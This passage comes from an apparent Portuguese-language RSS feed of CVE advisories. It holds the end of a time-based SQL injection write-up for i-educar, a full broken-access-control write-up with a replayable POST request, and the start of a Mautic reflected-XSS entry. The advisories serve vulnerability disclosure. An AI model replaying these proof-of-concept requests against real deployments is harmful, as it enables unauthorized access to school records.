&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: [COOKIE]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: none
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Este payload introduz um atraso de tempo, demonstrando a capacidade de executar consultas SQL arbitrárias.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10012/image.png&amp;#34;
	width=&amp;#34;1572&amp;#34;
	height=&amp;#34;707&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10012/image_hu_988aafc9dd1fbe7.png 480w, /p/cve-2025-10012/image_hu_7d467cabf908a825.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;222&amp;#34;
		data-flex-basis=&amp;#34;533px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10012/image-1.png&amp;#34;
	width=&amp;#34;1566&amp;#34;
	height=&amp;#34;711&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10012/image-1_hu_a4b5d2b9604e251f.png 480w, /p/cve-2025-10012/image-1_hu_465e2cc1a3c3c305.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;220&amp;#34;
		data-flex-basis=&amp;#34;528px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe o atraso de tempo na resposta do servidor, indicando a execução bem-sucedida do payload SQL.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Enumeração de banco de dados (esquemas, tabelas, usuários, versões).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10012.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10012.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 05 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10013</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-10013/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-10013/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10013-controle-de-acesso-quebrado-no-endpoint-exportacao-para-o-seb&amp;#34;&amp;gt;CVE-2025-10013: Controle de Acesso Quebrado no Endpoint &amp;lt;code&amp;gt;/exportacao-para-o-seb&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10013&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10013&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint &amp;lt;code&amp;gt;/exportacao-para-o-seb&amp;lt;/code&amp;gt; do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Endpoint Vulnerável:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;POST /exportacao-para-o-seb&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;Autenticação:&amp;lt;/b&amp;gt; Obrigatória&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10013-controle-de-acesso-quebrado-no-endpoint-exportacao-para-o-seb&amp;#34;&amp;gt;CVE-2025-10013: Controle de Acesso Quebrado no Endpoint &amp;lt;code&amp;gt;/exportacao-para-o-seb&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10013&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10013&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint &amp;lt;code&amp;gt;/exportacao-para-o-seb&amp;lt;/code&amp;gt; do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Endpoint Vulnerável:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;POST /exportacao-para-o-seb&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;Autenticação:&amp;lt;/b&amp;gt; Obrigatória&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Autenticar como um usuário sem privilégios.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10013/image.png&amp;#34;
	width=&amp;#34;1843&amp;#34;
	height=&amp;#34;533&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10013/image_hu_5ca2ea85ab6696dd.png 480w, /p/cve-2025-10013/image_hu_deb570b2049417e1.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;345&amp;#34;
		data-flex-basis=&amp;#34;829px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10013/image-1.png&amp;#34;
	width=&amp;#34;936&amp;#34;
	height=&amp;#34;436&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10013/image-1_hu_8cd5643a33eabd47.png 480w, /p/cve-2025-10013/image-1_hu_f205df0666d7bd3a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;214&amp;#34;
		data-flex-basis=&amp;#34;515px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Enviar a seguinte solicitação:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;19
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;20
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;POST /exportacao-para-o-seb HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Type: application/x-www-form-urlencoded
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Length: 47
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Origin: http://localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: http://localhost/exportacao-para-o-seb
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: i_educar_session=ikrAPvWjSx0V5drm82zlgu1kBByJdsCx1gJkiwsu
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;ano=2025&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;ref_cod_instituicao=1&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;ref_cod_escola=4
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Observamos que um arquivo está anexado à resposta. Este usuário não deve realizar esta solicitação.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10013/image-2.png&amp;#34;
	width=&amp;#34;1434&amp;#34;
	height=&amp;#34;538&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10013/image-2_hu_d9f0374d4aca283a.png 480w, /p/cve-2025-10013/image-2_hu_6d9f4bc0f197d6ba.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;266&amp;#34;
		data-flex-basis=&amp;#34;639px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Vulnerabilidades de Controle de Acesso Quebrado podem ter consequências graves, incluindo:
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Acesso não autorizado a funcionalidades restritas;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Escalonamento de privilégios para usuários de baixo nível;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Exposição de dados sensíveis e potencial comprometimento do sistema;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Perda de confidencialidade e integridade de registros educacionais;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Danos à reputação da organização.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10013.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10013.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 05 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9823</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9823/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9823/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9823-cross-site-scripting-xss-refletido-no-endpoint-sajaxactionleadaddleadtags-parâmetro-tags&amp;#34;&amp;gt;CVE-2025-9823: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;/s/ajax?action=lead:addLeadTags&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Tags&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9823&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9823&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;/s/ajax?action=lead:addLeadTags&amp;lt;/code&amp;gt; do aplicativo Mautic. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Tags&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/s/ajax?action=lead:addLeadTags&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;Tags&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo reflete essa entrada diretamente na resposta. Embora o servidor aplique a sanitização antes de armazenar os dados ou retorná-los posteriormente, o payload é executado imediatamente no navegador da vítima após a reflexão, permitindo que um invasor execute JavaScript arbitrário na sessão do usuário.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9823-cross-site-scripting-xss-refletido-no-endpoint-sajaxactionleadaddleadtags-parâmetro-tags&amp;#34;&amp;gt;CVE-2025-9823: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;/s/ajax?action=lead:addLeadTags&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Tags&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9823&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9823&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
